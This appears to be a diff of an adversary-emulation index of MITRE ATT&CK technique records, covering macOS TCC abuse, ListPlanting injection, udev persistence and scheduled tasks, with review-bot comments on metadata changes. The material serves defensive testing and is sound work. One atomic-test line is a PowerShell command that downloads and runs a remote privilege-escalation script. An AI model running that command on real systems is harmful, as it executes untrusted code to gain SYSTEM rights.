- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
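Review bot: the T1548.006 description switches from a double-quoted scalar to `|+`, which keeps the trailing empty line before `kill_chain_phases` as part of the value, so the string now ends in two newlines and the file gains a whitespace-sensitive blank line that editors tend to strip. The rest of this file uses `|-` (for example the T1134.005 description) or quoted scalars; `|-` yields the same text without the trailing newlines. Separately, the new text says `an overwrites file (if connected to an MDM)`; if that wording is verbatim from upstream leave it, otherwise `overrides file` is the usual term for the MDM-delivered TCC overrides.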
@@ -40334,6 +40596,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -40341,7 +40605,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -40371,7 +40635,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -40417,7 +40680,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -40462,8 +40725,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -40489,7 +40750,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -40515,8 +40776,6 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests:
- name: Logon Scripts
@@ -40546,53 +40805,24 @@ privilege-escalation:
name: command_prompt
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
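Review bot: the only substantive change in this hunk is the new `(Citation: Hexacorn Listplanting)` appended to the first sentence; the rest of the ListPlanting text is an unchanged re-wrap, so the line-by-line compare can be skipped. The new key matches the `source_name: Hexacorn Listplanting` entry added to this object's `external_references` later in the diff, which is what matters, since citation markers are resolved against `source_name` by exact string match.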
@@ -40609,6 +40839,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -40623,16 +40856,47 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests:
- name: Process injection ListPlanting
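Review bot: the `- spec_version: '2.1'` removal in this hunk recurs for every technique touched in this diff and is never re-added, while `x_mitre_attack_spec_version` is kept and bumped from 2.1.0 to 3.2.0 next to `x_mitre_modified_by_ref`. That is consistent with a regenerated export of the upstream data, but if the index loader or any downstream consumer keys on `spec_version`, it will now see a missing field; confirm nothing reads it before merging. Note also that this is more than a reorder: `x_mitre_version` moves from 1.0 to 1.1 and the object gains `x_mitre_platforms` (Windows), `x_mitre_domains`, `type`, `id`, `created` and `revoked`, none of which the old version carried.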
@@ -40672,7 +40936,7 @@ privilege-escalation:
elevation_required: true
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -40717,9 +40981,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
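Review bot: `- Azure AD` and `- SaaS` are removed and replaced by a single `- Identity Provider` entry, with `x_mitre_version` bumped to 3.1. This matches the platform consolidation in ATT&CK v16, but it narrows T1484 to identity-provider platforms only; if any per-platform CSV index (the SaaS one in particular) is generated from this field, it should be rebuilt in the same change so the indexes and this YAML stay in agreement.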
@@ -40776,8 +41039,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -40786,7 +41049,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -40828,7 +41090,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
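Review bot: `modified` for T1547.008 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T16:34:43.405Z`, and the same regression appears for T1546.007, T1574.004 and T1574.012 later in this diff. All of the old values share the `14:00:00.188Z` suffix, which suggests they were synthetic release-time stamps that the regenerated export has replaced with the real upstream timestamps; if so this is a correction rather than a downgrade, but any tooling that uses `modified` to decide whether a technique changed should be checked so it does not treat these objects as having gone back in time.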
@@ -40853,7 +41115,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests:
- name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -40897,7 +41158,7 @@ privilege-escalation:
elevation_required: true
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -40937,8 +41198,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -40946,13 +41209,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
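Review bot: `- Azure AD`, `- Office 365` and `- Google Workspace` are dropped from `x_mitre_platforms` in favour of `- Office Suite` and `- Identity Provider` (SaaS and IaaS remain), with the version moving to 1.8. Any index derived by filtering on the old platform names will silently lose this technique, so the platform-specific CSV indexes need regenerating with the new names; a quick sanity check is to grep the generated indexes for `T1078.004` before and after the rebuild and compare which files list it.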
@@ -40983,17 +41246,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
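Review bot: the new sentence on the `Win32_ScheduledJob` WMI class cites `(Citation: Malicious Life by Cybereason)`, and a matching `source_name` is added to `external_references` further down, so the key resolves. The addition also has a detection consequence worth carrying into the detection text when this object is next updated: a job created through `Win32_ScheduledJob` never spawns `at.exe`, so of the two data sources listed for this technique, `'Command: Command Execution'` will not observe it and coverage rests on `'Scheduled Job: Scheduled Job Creation'`.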
@@ -41056,7 +41316,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -41090,8 +41350,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -41100,6 +41360,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
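Review bot: the new `url:` for `Malicious Life by Cybereason` carries a `#blog-subscribe` fragment, which anchors the newsletter widget rather than the article; the reference resolves without it. Since this file mirrors the upstream STIX data the fix belongs upstream, but it is worth flagging so the fragment is not propagated into documents generated from this index.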
@@ -41112,7 +41376,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -41230,7 +41493,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -41279,6 +41541,65 @@ privilege-escalation:
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
name: powershell
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
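Review bot: the `x_mitre_detection` text for the new T1546.017 object tells defenders to monitor only `/etc/udev/rules.d/`, `/lib/udev/rules.d/` and `/usr/lib/udev/rules.d/`, while the description lists five rule directories including `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; a file-integrity rule built from the detection text alone would miss two load paths, so the detection list should name all five (the third path is also missing its backticks, unlike its neighbours). The object lands with `atomic_tests: []`, so nothing exercises the `'File: File Modification'` and `'Process: Process Creation'` data sources yet; that is fine for an index update but should be tracked.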
@@ -41314,7 +41635,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -41338,7 +41659,6 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -41378,7 +41698,7 @@ privilege-escalation:
elevation_required: true
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -41462,11 +41782,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -41518,9 +41837,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -41647,7 +41965,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -41685,8 +42003,6 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
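Review bot: for T1574.012 both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are removed with no replacement visible in this hunk, unlike T1078.003 just above, where the spec version is bumped to 3.2.0 rather than dropped. If the field is re-added elsewhere in this object it is outside the diff context; if it is genuinely gone, this object lacks a field the other techniques in the diff carry, which looks like an upstream omission worth confirming before merge.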
@@ -41822,23 +42138,24 @@ privilege-escalation:
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
